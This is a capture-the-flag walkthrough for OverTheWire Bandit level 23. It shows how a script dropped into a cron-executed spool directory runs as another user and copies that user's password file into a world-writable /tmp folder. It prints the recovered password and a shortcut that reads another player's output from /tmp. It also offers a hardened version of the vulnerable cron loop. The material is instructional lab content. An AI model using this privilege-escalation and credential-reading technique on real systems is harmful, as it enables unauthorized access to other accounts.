OverTheWire: Bandit Level 23

Bandit Level 23 → Level 24

Level Goal: A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!
NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…

On this level, we are told that a cron job is running and that we need to look in /etc/cron.d/ for its configuration. So, we change to that directory and use the ls command to list the files inside it. As the next level is bandit24, we read cronjob_bandit24 using the cat command. It shows that the script /usr/bin/cronjob_bandit24.sh runs every minute as the user bandit24. So, we read that script using cat as well. It stores the output of the whoami command in a variable named myname, changes directory to /var/spool/$myname, and then executes every file it finds there. After executing each file, it deletes it.

➜  ~ ssh bandit23@bandit.labs.overthewire.org -p 2220
bandit23@bandit:~$ cd /etc/cron.d
bandit23@bandit:/etc/cron.d$ ls -l
total 91
-r--r----- 1 root root  46 Nov 14  2014 behemoth4_cleanup
-rw-r--r-- 1 root root 355 May 25  2013 cron-apt
-rw-r--r-- 1 root root  61 Nov 14  2014 cronjob_bandit22
-rw-r--r-- 1 root root  62 Nov 14  2014 cronjob_bandit23
-rw-r--r-- 1 root root  61 May  3  2015 cronjob_bandit24
-r--r----- 1 root root  47 Nov 14  2014 leviathan5_cleanup
-rw------- 1 root root 233 Nov 14  2014 manpage3_resetpw_job
-rw-r--r-- 1 root root  51 Nov 14  2014 melinda-stats
-rw-r--r-- 1 root root  54 Jun 25  2016 natas-session-toucher
-rw-r--r-- 1 root root  49 Jun 25  2016 natas-stats
-r--r----- 1 root root  44 Jun 25  2016 natas25_cleanup
-r--r----- 1 root root  47 Aug  3  2015 natas25_cleanup~
-r--r----- 1 root root  47 Jun 25  2016 natas26_cleanup
-r--r----- 1 root root  43 Jun 25  2016 natas27_cleanup
-rw-r--r-- 1 root root 510 Oct 29  2014 php5
-rw-r--r-- 1 root root  63 Jul  8  2015 semtex0-32
-rw-r--r-- 1 root root  63 Jul  8  2015 semtex0-64
-rw-r--r-- 1 root root  64 Jul  8  2015 semtex0-ppc
-rw-r--r-- 1 root root  35 Nov 14  2014 semtex5
-rw-r--r-- 1 root root 396 Nov 10  2013 sysstat
-rw-r--r-- 1 root root  29 Nov 14  2014 vortex0
-rw-r--r-- 1 root root  30 Nov 14  2014 vortex20
bandit23@bandit:/etc/cron.d$ cat cronjob_bandit24
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
bandit23@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash
myname=$(whoami)
cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
 echo "Handling $i"
 timeout -s 9 60 "./$i"
 rm -f "./$i"
    fi
done
bandit23@bandit:/etc/cron.d$

Now, to get the password for the next level, we have to create a script of our own and put it inside /var/spool/bandit24, so that it will cat the password file /etc/bandit_pass/bandit24 into a location we can read. We save the script under the name of the next user, bandit24.sh; the cron job runs as bandit24 and executes the files it finds in /var/spool/bandit24.

bandit23@bandit:~$ mkdir /tmp/testdir-pyro/
bandit23@bandit:~$ nano bandit24.sh
bandit23@bandit:~$ cat bandit24.sh
#!/bin/bash
cat /etc/bandit_pass/bandit24 >> /tmp/testdir-pyro/level24

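Now, for the cron job to run the script successfully, the permissions have to be right: bandit24 must be able to read and execute the script we just created, and must be able to write to the directory we created for the output. We use chmod 777 on both.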

bandit23@bandit:/tmp/testdir-pyro/$ chmod 777 bandit24.sh
bandit23@bandit:/tmp/testdir-pyro/$ cp bandit24.sh /var/spool/bandit24/
bandit23@bandit:/tmp/testdir-pyro/$ chmod 777 /tmp/testdir-pyro/
bandit23@bandit:/tmp/testdir-pyro/$ ls /var/spool/bandit24/
bandit24.sh

Now we wait for the cron job to execute. Have a bit of patience; it will take some time. Afterwards, the script is gone from /var/spool/bandit24/, and when we list the files inside our directory, we see that a new file has been created. Reading the contents of that file gives us the password that we were looking for in this level.

<----After a couple of minutes---->
bandit23@bandit:/tmp/testdir-pyro/$ ls /var/spool/bandit24/
bandit23@bandit:/tmp/testdir-pyro/$ ls
bandit24.sh  level24
bandit23@bandit:/tmp/testdir-pyro/$ cat level24
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
bandit23@bandit:/tmp/testdir-pyro/$
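
The cron script on this level runs every file in the spool directory, no matter who placed it there. A hardened variant of that loop, as an added example that is not OverTheWire's script or part of the original walkthrough: it executes an entry only if it is a regular file owned by a trusted account and not group- or world-writable. The function names run_spool and is_trusted and the trust rule itself are assumptions chosen for illustration; USER may be a user name or a numeric uid.

```shell
#!/bin/sh
# Added example (not the OverTheWire script): the spool runner from this
# level, restricted to files that a trusted account placed there.

# is_trusted FILE USER: true only for a regular file (symlinks are rejected)
# owned by USER that is neither group- nor world-writable.
is_trusted() {
    [ -n "$(find "$1" -prune -type f -user "$2" \
            ! -perm -020 ! -perm -002 -print 2>/dev/null)" ]
}

# run_spool DIR USER: run trusted entries, refuse the rest, then delete
# every entry as the original job does. Prints one line per entry.
run_spool() {
    dir=$1 user=$2
    for f in "$dir"/* "$dir"/.*; do
        name=${f##*/}
        case $name in .|..) continue ;; esac
        [ -e "$f" ] || [ -L "$f" ] || continue   # unmatched glob pattern
        if is_trusted "$f" "$user"; then
            echo "run $name"
            timeout -s 9 60 "$f" >/dev/null 2>&1 || echo "exit-nonzero $name"
        else
            echo "refused $name"
        fi
        rm -f -- "$f"
    done
}
```

With this check, a script copied in by another user, or one left at mode 777 as in the walkthrough, is deleted without being executed.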

Notes:

If the method above doesn’t work for you, there is another way to grab the password. It is based on the method that we used at an earlier level. In the previous level we hashed the string I am user bandit23; now that we have to grab the password for bandit24, we take I am user bandit24, convert it to MD5, and use that text as the name of the file in /tmp that holds the password for the next level. We prefer this method because it is obviously faster and easier.

bandit23@bandit:/tmp/$ echo I am user bandit24 | md5sum | cut -d ' ' -f 1
ee4ee1703b083edac9f8183e4ae70293
bandit23@bandit:/tmp/$ cat /tmp/ee4ee1703b083edac9f8183e4ae70293
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
bandit23@bandit:/tmp/$
